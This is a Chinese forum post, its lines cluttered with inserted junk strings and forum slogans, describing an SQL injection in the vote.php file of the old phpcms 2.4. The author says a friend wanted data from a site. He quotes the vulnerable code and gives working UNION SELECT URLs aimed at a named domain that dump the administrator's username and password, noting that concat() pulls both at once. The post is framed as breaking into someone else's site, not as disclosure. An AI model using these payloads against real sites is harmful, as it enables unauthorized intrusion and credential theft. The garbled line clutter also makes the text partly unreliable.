by 华鸡[D.R.T]
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站; ~! Y1 p* p5 F# Y$ X
8 R; B" [: h) @8 Q% l" x3 Swww.520diannao.com今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看
4 o+ `, F* r: v/ g* Zwww.520diannao.com打开一看发现是phpcms2.4,很旧的版本了~~
& b ?8 t7 p. Q( Y% g, T# \
搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧
C z) p& @( ^' F' a挖了1个多小时,发现vote.php中有这样一段代码:
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站* r* |# c3 G" b/ p. s
...省略....
, n: Y3 I0 X6 J% g- R8 a我爱电脑技术社区--打造最好的电脑技术自学交流平台case 'result':
! U2 }9 p( g9 a0 ?www.520diannao.comif(!intval($voteid)){
我爱电脑技术社区--打造最好的电脑技术自学交流平台% v1 z& M4 p/ N7 H
message('参数错误!',$PHP_REFERER);
我爱电脑技术社区--打造最好的电脑技术自学交流平台9 G4 S1 _& v& g9 Q' d& C/ c
}
$ Y8 t1 z P8 Z5 W/ p' K/ B( `电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站$query = $db->query("SELECT * FROM $table_vote_subject where voteid='$voteid' and passed=1");
打造最好的电脑自学交流论坛7 M7 g3 g% `4 N* ~6 k4 v# c' d q
$vote=$db->fetch_array($query);
打造最好的电脑自学交流论坛 p; g4 ^+ Z7 G# r8 }. Z' D+ o
$subject=$vote[subject];
我爱电脑技术论坛; q& N8 L8 J2 l5 Z: e7 E: N3 n8 I
$totalnumber=$vote[totalnumber];
4 m& y4 Y' `# W N打造最好的电脑自学交流论坛$fromdate=date("Y-m-d",$vote[fromtime]);
www.520diannao.com' I" h$ S( S7 u4 f. D3 H7 U/ T
$todate=$vote[totime] ? date("Y-m-d",$vote[totime]) : "";
) L s( e1 _4 z+ E& V我爱电脑技术社区--打造最好的电脑技术自学交流平台$query = $db->query("SELECT * FROM $table_vote_option where voteid='$voteid'");
# f2 { J3 A3 J: w) c
while($op=$db->fetch_array($query)){
我爱电脑技术论坛* C0 f R4 \- t
$op[percent1]=$totalnumber ? round(100*$op[number]/$vote[totalnumber],2)."%" : "0%";
9 F8 i5 g9 T- Y" C% o打造最好的电脑自学交流论坛$op[percent2]=$totalnumber ? (100-round(100*$op[number]/$vote[totalnumber],0))."%" : "100%";
打造最好的电脑自学交流论坛& Q) U V2 Y! |; k7 t( C$ J) E/ h
$ops[]=$op;
打造最好的电脑自学交流论坛1 H6 r0 a" w! p3 e9 _9 P
}
我爱电脑技术论坛! n. J1 p, L* Y) q9 {, Q: c
include template('vote_result');
4 m" F# ?' e' H4 `( m我爱电脑技术社区--打造最好的电脑技术自学交流平台break;
我爱电脑技术社区--打造最好的电脑技术自学交流平台3 i# I- e* W8 p' b0 `6 F
}
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站$ W1 T# @2 l) i0 ?) m; L
....省略....
1 ]" U2 [/ J# G$ F
代码没问题把?真的吗?再仔细看看!!
- ^' s$ f% u$ S1 n$ J" J1 n' }( m我爱电脑技术社区--打造最好的电脑技术自学交流平台“if(!intval($voteid))” 这句代码的意思是啥?
f/ i7 K6 A, m6 @www.520diannao.com如果提交过来的数据是整型并且不存在于数据库中的话,就返回“参数错误”。
: |$ o- j1 ~# a! g) Y( F0 d% p" L5 Mwww.520diannao.com那如果我们提交的数据不是整型呢?如果我们提交的数据不是整型,那么不管提交的数据是否存在于数据库中都不会返回“参数错误”的提示了,这样,注入漏洞就产生了~~哈哈
# {8 r$ C# A1 K! h- C& i% U电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站分别提交
打造最好的电脑自学交流论坛5 Y7 M1 w9 L% @0 z* r
“
http://www.cndrt.cn/vote.php?action=result&;voteid=8%20and%201=2%20union%20select%201,username,3,4,5,6,7,8,9,10,11,12,13%20from%20phpcms_member%20where%20userid=1/*””
/ }, V! U$ @8 `; A5 |) @我爱电脑技术社区--打造最好的电脑技术自学交流平台“
http://www.cndrt.cn/vote.php?action=result&;voteid=8%20and%201=2%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13%20from%20phpcms_member%20where%20userid=1/*””
打造最好的电脑自学交流论坛1 g) Y6 F6 \9 A& H8 f' L0 E
就能查出管理员了
0 T8 g% a3 N! A. U6 u. O; u; E我爱电脑技术论坛当然你也可以用concat()把账号密码同时抓出来~~
